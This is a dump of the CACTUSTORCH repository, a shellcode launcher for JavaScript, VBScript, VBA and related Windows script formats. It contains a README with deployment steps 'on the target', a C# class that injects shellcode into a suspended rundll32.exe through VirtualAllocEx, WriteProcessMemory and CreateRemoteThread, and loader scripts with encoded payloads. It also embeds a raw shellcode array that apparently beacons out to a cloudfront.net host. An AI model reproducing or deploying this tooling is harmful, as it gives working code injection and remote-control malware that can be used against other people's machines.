├── banner.txt ├── splitvba.py ├── README.md ├── CACTUSTORCH.cs └── TestClass.cs ├── CACTUSTORCH.xsl ├── CACTUSTORCH.js ├── CACTUSTORCH.jse ├── CACTUSTORCH.sct ├── CACTUSTORCH.vbe ├── CACTUSTORCH.vbs ├── CACTUSTORCH.hta └── CACTUSTORCH.vba /banner.txt: -------------------------------------------------------------------------------- 1 | ███████╗██████╗ ██╗ ██╗████████╗██╗ ██╗██████╗ █████╗ 2 | ██╔════╝██╔══██╗██║ ██║╚══██╔══╝██║ ██║██╔══██╗██╔══██╗ 3 | ███████╗██████╔╝██║ ██║ ██║ ██║ ██║██████╔╝███████║ 4 | ╚════██║██╔═══╝ ██║ ██║ ██║ ╚██╗ ██╔╝██╔══██╗██╔══██║ 5 | ███████║██║ ███████╗██║ ██║ ╚████╔╝ ██████╔╝██║ ██║ 6 | ╚══════╝╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝ 7 | -------------------------------------------------------------------------------- /splitvba.py: -------------------------------------------------------------------------------- 1 | import os; 2 | import random; 3 | import uuid; 4 | import string; 5 | import sys; 6 | import argparse; 7 | 8 | def banner(): 9 | with open('banner.txt', 'r') as f: 10 | data = f.read() 11 | 12 | print "\033[1;31m%s\033[0;0m" % data 13 | print "\033[1;34mSplits base64 encoded payload into chunks for VBA" 14 | print "\033[1;32mAuthor: Vincent Yiu (@vysec, @vysecurity)\033[0;0m" 15 | 16 | def split_len(seq, length): 17 | return [seq[i:i+length] for i in range(0, len(seq), length)] 18 | 19 | if __name__ == '__main__': 20 | banner() 21 | if ((len(sys.argv) > 3) or len(sys.argv) < 3): 22 | # must be not 1 23 | print "Usage: " + sys.argv[0] + " " 24 | sys.exit(1) 25 | 26 | print "[*] Input file: " + sys.argv[1] 27 | 28 | f = open(sys.argv[1], 'r') 29 | code = f.read() 30 | f.close() 31 | 32 | # split into 100 char blocks 33 | output = split_len(code, 100) 34 | 35 | print "[*] Output file: " + sys.argv[2] 36 | f = open(sys.argv[2], 'w+') 37 | for a in output: 38 | f.write("code = code & \"" + a + "\"\r\n") 39 | f.close() 40 | -------------------------------------------------------------------------------- /README.md: 
-------------------------------------------------------------------------------- 1 | ``` 2 | ( ) ( ) 3 | ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( 4 | )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) 5 | (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ 6 | )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) 7 | ((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | 8 | | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | 9 | \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| 10 | 11 | ``` 12 | 13 | Author and Credits 14 | ================== 15 | Author: Vincent Yiu (@vysecurity) 16 | 17 | Credits: 18 | - @cn33liz: Inspiration with StarFighters 19 | - @tiraniddo: James Forshaw for DotNetToJScript 20 | - @armitagehacker: Raphael Mudge for the idea of selecting the 32 bit version of the binary on 64 bit architecture machines as the process to inject into 21 | - @_RastaMouse: Testing and giving recommendations around README 22 | - @bspence7337: Testing 23 | 24 | Description 25 | =========== 26 | 27 | A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it. As written in CACTUSTORCH.cs/TestClass.cs, the injection is done by the cactusTorch .NET class, loaded into the script host via DotNetToJScript: it starts the binary with CreateProcessA and CREATE_SUSPENDED, allocates EXECUTE_READWRITE memory in it with VirtualAllocEx, copies the shellcode with WriteProcessMemory and runs it with CreateRemoteThread. 28 | 29 | DotNetToJScript can be found here: https://github.com/tyranid/DotNetToJScript 30 | 31 | Usage: 32 | ====== 33 | 34 | * Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... 35 | * Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework 36 | * Run: cat payload.bin | base64 -w 0 37 | * For JavaScript: Copy the base64 encoded payload into the code variable below 38 | 39 | ```var code = "";``` 40 | 41 | * For VBScript: Copy the base64 encoded payload into the code variable below 42 | 43 | ```Dim code: code = ""``` 44 | * Then run: 45 | 46 | ```wscript.exe CACTUSTORCH.js``` or ```wscript.exe CACTUSTORCH.vbs``` via command line on the target, or double click on the files within Explorer. 
47 | 48 | * For VBA: Copy the base64 encoded payload into a file such as code.txt 49 | 50 | * Run python splitvba.py code.txt output.txt 51 | 52 | * Copy output.txt under the following bit so it looks like: 53 | 54 | ``` 55 | code = "" 56 | code = code & " Host CACTUSTORCH Payload 71 | * Fill in fields 72 | * File hosted and ready to go! 73 | -------------------------------------------------------------------------------- /CACTUSTORCH.cs/TestClass.cs: -------------------------------------------------------------------------------- 1 | // This file is part of DotNetToJScript. 2 | // Copyright (C) James Forshaw 2017 3 | // 4 | // DotNetToJScript is free software: you can redistribute it and/or modify 5 | // it under the terms of the GNU General Public License as published by 6 | // the Free Software Foundation, either version 3 of the License, or 7 | // (at your option) any later version. 8 | // 9 | // DotNetToJScript is distributed in the hope that it will be useful, 10 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | // GNU General Public License for more details. 13 | // 14 | // You should have received a copy of the GNU General Public License 15 | // along with DotNetToJScript. If not, see <http://www.gnu.org/licenses/>. 
16 | 17 | using System.Diagnostics; 18 | using System.Runtime.InteropServices; 19 | using System.Windows.Forms; 20 | using System; 21 | using System.Text; 22 | 23 | [ComVisible(true)] 24 | public class cactusTorch 25 | { 26 | 27 | [StructLayout(LayoutKind.Sequential)] 28 | public class SecurityAttributes 29 | { 30 | public Int32 Length = 0; 31 | public IntPtr lpSecurityDescriptor = IntPtr.Zero; 32 | public bool bInheritHandle = false; 33 | 34 | public SecurityAttributes() 35 | { 36 | this.Length = Marshal.SizeOf(this); 37 | } 38 | } 39 | 40 | [StructLayout(LayoutKind.Sequential)] 41 | public struct ProcessInformation 42 | { 43 | public IntPtr hProcess; 44 | public IntPtr hThread; 45 | public Int32 dwProcessId; 46 | public Int32 dwThreadId; 47 | } 48 | 49 | [Flags] 50 | public enum CreateProcessFlags : uint 51 | { 52 | DEBUG_PROCESS = 0x00000001, 53 | DEBUG_ONLY_THIS_PROCESS = 0x00000002, 54 | CREATE_SUSPENDED = 0x00000004, 55 | DETACHED_PROCESS = 0x00000008, 56 | CREATE_NEW_CONSOLE = 0x00000010, 57 | NORMAL_PRIORITY_CLASS = 0x00000020, 58 | IDLE_PRIORITY_CLASS = 0x00000040, 59 | HIGH_PRIORITY_CLASS = 0x00000080, 60 | REALTIME_PRIORITY_CLASS = 0x00000100, 61 | CREATE_NEW_PROCESS_GROUP = 0x00000200, 62 | CREATE_UNICODE_ENVIRONMENT = 0x00000400, 63 | CREATE_SEPARATE_WOW_VDM = 0x00000800, 64 | CREATE_SHARED_WOW_VDM = 0x00001000, 65 | CREATE_FORCEDOS = 0x00002000, 66 | BELOW_NORMAL_PRIORITY_CLASS = 0x00004000, 67 | ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000, 68 | INHERIT_PARENT_AFFINITY = 0x00010000, 69 | INHERIT_CALLER_PRIORITY = 0x00020000, 70 | CREATE_PROTECTED_PROCESS = 0x00040000, 71 | EXTENDED_STARTUPINFO_PRESENT = 0x00080000, 72 | PROCESS_MODE_BACKGROUND_BEGIN = 0x00100000, 73 | PROCESS_MODE_BACKGROUND_END = 0x00200000, 74 | CREATE_BREAKAWAY_FROM_JOB = 0x01000000, 75 | CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000, 76 | CREATE_DEFAULT_ERROR_MODE = 0x04000000, 77 | CREATE_NO_WINDOW = 0x08000000, 78 | PROFILE_USER = 0x10000000, 79 | PROFILE_KERNEL = 0x20000000, 80 | 
PROFILE_SERVER = 0x40000000, 81 | CREATE_IGNORE_SYSTEM_DEFAULT = 0x80000000, 82 | } 83 | 84 | [Flags] 85 | public enum DuplicateOptions : uint 86 | { 87 | DUPLICATE_CLOSE_SOURCE = 0x00000001, 88 | DUPLICATE_SAME_ACCESS = 0x00000002 89 | } 90 | 91 | [StructLayout(LayoutKind.Sequential)] 92 | public class StartupInfo 93 | { 94 | public Int32 cb = 0; 95 | public IntPtr lpReserved = IntPtr.Zero; 96 | public IntPtr lpDesktop = IntPtr.Zero; // MUST be Zero 97 | public IntPtr lpTitle = IntPtr.Zero; 98 | public Int32 dwX = 0; 99 | public Int32 dwY = 0; 100 | public Int32 dwXSize = 0; 101 | public Int32 dwYSize = 0; 102 | public Int32 dwXCountChars = 0; 103 | public Int32 dwYCountChars = 0; 104 | public Int32 dwFillAttribute = 0; 105 | public Int32 dwFlags = 0; 106 | public Int16 wShowWindow = 0; 107 | public Int16 cbReserved2 = 0; 108 | public IntPtr lpReserved2 = IntPtr.Zero; 109 | public IntPtr hStdInput = IntPtr.Zero; 110 | public IntPtr hStdOutput = IntPtr.Zero; 111 | public IntPtr hStdError = IntPtr.Zero; 112 | 113 | public StartupInfo() 114 | { 115 | this.cb = Marshal.SizeOf(this); 116 | } 117 | } 118 | 119 | [Flags()] 120 | public enum AllocationType : uint 121 | { 122 | COMMIT = 0x1000, 123 | RESERVE = 0x2000, 124 | GO = 0x3000, 125 | RESET = 0x80000, 126 | LARGE_PAGES = 0x20000000, 127 | PHYSICAL = 0x400000, 128 | TOP_DOWN = 0x100000, 129 | WRITE_WATCH = 0x200000 130 | } 131 | 132 | 133 | [Flags()] 134 | public enum MemoryProtection : uint 135 | { 136 | EXECUTE = 0x10, 137 | EXECUTE_READ = 0x20, 138 | EXECUTE_READWRITE = 0x40, 139 | EXECUTE_WRITECOPY = 0x80, 140 | NOACCESS = 0x01, 141 | READONLY = 0x02, 142 | READWRITE = 0x04, 143 | WRITECOPY = 0x08, 144 | GUARD_Modifierflag = 0x100, 145 | NOCACHE_Modifierflag = 0x200, 146 | WRITECOMBINE_Modifierflag = 0x400 147 | } 148 | 149 | // CreateProcessA 150 | [DllImport("kernel32.dll")] 151 | public static extern IntPtr CreateProcessA( 152 | String lpApplicationName, 153 | String lpCommandLine, 154 | SecurityAttributes 
lpProcessAttributes, 155 | SecurityAttributes lpThreadAttributes, 156 | Boolean bInheritHandles, 157 | CreateProcessFlags dwCreationFlags, 158 | IntPtr lpEnvironment, 159 | String lpCurrentDirectory, 160 | [In] StartupInfo lpStartupInfo, 161 | out ProcessInformation lpProcessInformation 162 | 163 | ); 164 | 165 | // VirtualAllocEx 166 | [DllImport("kernel32.dll")] 167 | public static extern IntPtr VirtualAllocEx( 168 | IntPtr lpHandle, 169 | IntPtr lpAddress, 170 | IntPtr dwSize, 171 | AllocationType flAllocationType, 172 | MemoryProtection flProtect 173 | ); 174 | 175 | // WriteProcessMemory 176 | [DllImport("kernel32.dll")] 177 | public static extern bool WriteProcessMemory( 178 | IntPtr hProcess, 179 | IntPtr lpBaseAddress, 180 | byte[] buffer, 181 | IntPtr dwSize, 182 | int lpNumberOfBytesWritten); 183 | 184 | // TerminateProcess 185 | 186 | [DllImport("kernel32.dll")] 187 | public static extern bool TerminateProcess( 188 | IntPtr hProcess, 189 | uint uExitCode); 190 | 191 | // CreateRemoteThread 192 | [DllImport("kernel32.dll")] 193 | static extern IntPtr CreateRemoteThread( 194 | IntPtr hProcess, 195 | IntPtr lpThreadAttributes, 196 | uint dwStackSize, 197 | IntPtr lpStartAddress, 198 | IntPtr lpParameter, 199 | uint dwCreationFlags, 200 | IntPtr lpThreadId); 201 | 202 | public cactusTorch() 203 | { 204 | MessageBox.Show("Test", "Test", MessageBoxButtons.OK, MessageBoxIcon.Exclamation); 205 | flame("rundll32.exe", "blab"); 206 | } 207 | 208 | public void flame(string binary, string shellcode32) 209 | { 210 | // Written by Vincent Yiu (@vysecurity) 211 | 212 | // shellcode contains base64 shellcode 213 | // binary contains binary to inject into 214 | 215 | //byte[] sc = Convert.FromBase64String(shellcode32); 216 | byte[] sc = new byte[841] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 
0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0xa4, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0xbb, 0x01, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0x50, 0xe9, 0x8c, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x32, 0xa0, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x68, 0x80, 0x33, 0x00, 0x00, 0x89, 0xe0, 0x6a, 0x04, 0x50, 0x6a, 0x1f, 0x56, 0x68, 0x75, 0x46, 0x9e, 0x86, 0xff, 0xd5, 0x5f, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xca, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x75, 0x07, 0x58, 0x50, 0xe9, 0x7b, 0xff, 0xff, 0xff, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x6f, 0xff, 0xff, 0xff, 0x2f, 0x5f, 0x69, 0x6e, 0x69, 0x74, 0x2e, 0x67, 0x69, 0x66, 
0x3f, 0x75, 0x74, 0x6d, 0x63, 0x6e, 0x3d, 0x31, 0x26, 0x75, 0x74, 0x6d, 0x63, 0x73, 0x3d, 0x49, 0x53, 0x4f, 0x2d, 0x38, 0x38, 0x39, 0x39, 0x2d, 0x31, 0x26, 0x75, 0x74, 0x6d, 0x73, 0x72, 0x3d, 0x31, 0x32, 0x38, 0x30, 0x78, 0x31, 0x30, 0x32, 0x34, 0x26, 0x75, 0x74, 0x6d, 0x73, 0x63, 0x3d, 0x33, 0x32, 0x2d, 0x62, 0x69, 0x74, 0x26, 0x75, 0x74, 0x6d, 0x75, 0x6c, 0x3d, 0x65, 0x6e, 0x2d, 0x55, 0x53, 0x00, 0xb9, 0x90, 0x00, 0x48, 0x6f, 0x73, 0x74, 0x3a, 0x20, 0x64, 0x32, 0x6e, 0x78, 0x79, 0x34, 0x6a, 0x67, 0x62, 0x71, 0x63, 0x75, 0x6a, 0x6d, 0x2e, 0x63, 0x6c, 0x6f, 0x75, 0x64, 0x66, 0x72, 0x6f, 0x6e, 0x74, 0x2e, 0x6e, 0x65, 0x74, 0x0d, 0x0a, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x39, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x30, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x35, 0x2e, 0x30, 0x3b, 0x20, 0x42, 0x4f, 0x31, 0x49, 0x45, 0x38, 0x5f, 0x76, 0x31, 0x3b, 0x45, 0x4e, 0x55, 0x53, 0x29, 0x0d, 0x0a, 0x00, 0x43, 0x60, 0xcd, 0x0a, 0xe7, 0x58, 0x40, 0x49, 0x30, 0x40, 0x89, 0xa6, 0x41, 0x3d, 0x82, 0x02, 0x9d, 0x32, 0xe1, 0x97, 0xa6, 0x9d, 0xb1, 0xbe, 0x32, 0x62, 0x34, 0x5f, 0xaf, 0xf8, 0x62, 0x64, 0x9e, 0x64, 0xc6, 0x2d, 0xe3, 0x5d, 0xb7, 0xde, 0x73, 0x6f, 0x92, 0x71, 0x0c, 0x41, 0x49, 0x15, 0x42, 0xab, 0x62, 0x11, 0x42, 0xf9, 0x0e, 0xda, 0x3d, 0x99, 0xb0, 0x3d, 0xb3, 0xf3, 0x0a, 0x3f, 0x5d, 0x90, 0x0f, 0xda, 0xd5, 0xc5, 0x43, 0x21, 0xec, 0x97, 0x2a, 0xb8, 0x42, 0x5d, 0xbc, 0x54, 0x4b, 0x0d, 0xe5, 0x3a, 0xc0, 0x48, 0x9f, 0x88, 0x96, 0xc4, 0x10, 0xe4, 0xa6, 0x4a, 0xa6, 0x66, 0x7d, 0xe5, 0x5f, 0xe5, 0xb8, 0x67, 0xf8, 0xbc, 0x94, 0x8f, 0xa3, 0xee, 0x52, 0xf3, 0x65, 0xa1, 0x15, 0x63, 0x35, 0xdd, 0x4b, 0xbb, 0x72, 0xd1, 0xa3, 0xdc, 0xfc, 0x47, 0xdd, 0xec, 0xe4, 0x14, 0x1e, 0x50, 0x0e, 0x79, 
0x74, 0x2e, 0xb1, 0x7f, 0xe5, 0xe9, 0x27, 0x21, 0xc4, 0xee, 0x3b, 0x2b, 0x60, 0xc0, 0x17, 0x99, 0x06, 0x71, 0x3e, 0x2d, 0x8d, 0x8f, 0xe5, 0x69, 0xd8, 0x6d, 0x3f, 0x4a, 0x9b, 0x2a, 0x53, 0xc9, 0xb6, 0x97, 0x55, 0x26, 0xdd, 0xc8, 0x12, 0xd8, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x28, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0x89, 0xfd, 0xff, 0xff, 0x63, 0x64, 0x6e, 0x2e, 0x63, 0x6f, 0x69, 0x6e, 0x72, 0x61, 0x6e, 0x6b, 0x69, 0x6e, 0x67, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x73, 0x7f, 0xb7, 0xcc }; 217 | IntPtr size = new IntPtr(sc.Length); 218 | StartupInfo sInfo = new StartupInfo(); 219 | sInfo.dwFlags = 0; 220 | ProcessInformation pInfo; 221 | string binaryPath = ""; 222 | // We check what architecture OS it is here 223 | 224 | if (Environment.GetEnvironmentVariable("ProgramW6432").Length > 0) 225 | { 226 | //64 bit 227 | binaryPath = Environment.GetEnvironmentVariable("windir") + "\\SysWOW64\\" + binary; 228 | } 229 | else 230 | { 231 | //32 bit 232 | binaryPath = Environment.GetEnvironmentVariable("windir") + "\\System32\\" + binary; 233 | } 234 | 235 | // We have select the correct directory, for the executeable 236 | 237 | // Create the Process in SUSPENDED state 238 | IntPtr funcAddr = CreateProcessA(binaryPath, null, null, null, true, CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, sInfo, out pInfo); 239 | IntPtr hProcess = pInfo.hProcess; 240 | if (hProcess.ToString() != IntPtr.Zero) { 241 | //MessageBox.Show("hProcess: " + hProcess.ToString("X8")); 242 | // Use VirtualAllocEx to create some space 243 | 244 | IntPtr spaceAddr = VirtualAllocEx(hProcess, new IntPtr(0), size, AllocationType.GO, MemoryProtection.EXECUTE_READWRITE); 
245 | 246 | //MessageBox.Show("Virtual Alloc: " + spaceAddr.ToString("X8")); 247 | 248 | if (spaceAddr.ToString() == IntPtr.Zero) 249 | { 250 | // TerminateProcess incase failed to Valloc for some reason. 251 | TerminateProcess(hProcess, 0); 252 | } 253 | else 254 | { 255 | // Use WriteProcessMemory to WRITE "POKEMON" in 256 | int test = 0; 257 | 258 | IntPtr size2 = new IntPtr(sc.Length); 259 | bool bWrite = WriteProcessMemory(hProcess, spaceAddr, sc, size2, test); 260 | 261 | //MessageBox.Show("WriteProcessMemory: " + bWrite.ToString()); 262 | 263 | // CreateRemoteThread to start it up 264 | CreateRemoteThread(hProcess, new IntPtr(0), new uint(), spaceAddr, new IntPtr(0), new uint(), new IntPtr(0)); 265 | 266 | } 267 | } 268 | 269 | 270 | //Process.Start(shellcode); 271 | } 272 | } 273 | 274 | -------------------------------------------------------------------------------- /CACTUSTORCH.xsl: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 232 | 233 | -------------------------------------------------------------------------------- /CACTUSTORCH.js: -------------------------------------------------------------------------------- 1 | /* 2 | ( ) ( ) 3 | ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( 4 | )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) 5 | (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ 6 | )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) 7 | ((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | 8 | | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | 9 | \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| 10 | 11 | Author: Vincent Yiu (@vysecurity) 12 | Credits: 13 | - @cn33liz: Inspiration with StarFighter 14 | - @ttiraniddo: James Forshaw for DotNet2JScript 15 | - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into 16 | 17 | A JavaScript and VBScript shellcode launcher. 
This will spawn a 32 bit version of the binary specified and inject shellcode into it. 18 | 19 | Usage: 20 | Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... 21 | Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework 22 | Run: cat payload.bin | base64 -w 0 23 | Copy the base64 encoded payload into the code variable below. 24 | 25 | */ 26 | 27 | // Replace binary with a executable in both SYSTEM32 and SYSWOW64 that you want to use as container. eg. notepad.exe, calc.exe 28 | var binary = "rundll32.exe"; 29 | 30 | // Replace code with base64 encoded 32 bit shellcode 31 | var code = "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqzckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAAAAIAAAUAAAAAAAAABQAAAAA"; 32 | 33 | 34 | // ------------ DO NOT EDIT BELOW HERE -------------- 35 | 36 | function setversion() { 37 | var shell = new ActiveXObject('WScript.Shell'); 38 | ver = 'v4.0.30319'; 39 | try { 40 | shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\'); 41 | } catch(e) { 42 | ver = 'v2.0.50727'; 43 | } 44 | shell.Environment('Process')('COMPLUS_Version') = ver; 45 | 46 | } 47 | function debug(s) {} 48 | function base64ToStream(b) { 49 | var enc = new ActiveXObject("System.Text.ASCIIEncoding"); 50 | var length = enc.GetByteCount_2(b); 51 | var ba = enc.GetBytes_4(b); 52 | var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); 53 | ba = transform.TransformFinalBlock(ba, 0, length); 54 | var ms = new ActiveXObject("System.IO.MemoryStream"); 55 | ms.Write(ba, 0, (length / 4) * 3); 56 | ms.Position = 0; 57 | 
return ms; 58 | } 59 | 60 | var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ 61 | "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ 62 | "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ 63 | "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ 64 | "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ 65 | "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ 66 | "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+ 67 | "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+ 68 | "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+ 69 | "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+ 70 | "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+ 71 | "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+ 72 | "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+ 73 | "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+ 74 | "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+ 75 | "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+ 76 | "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+ 77 | 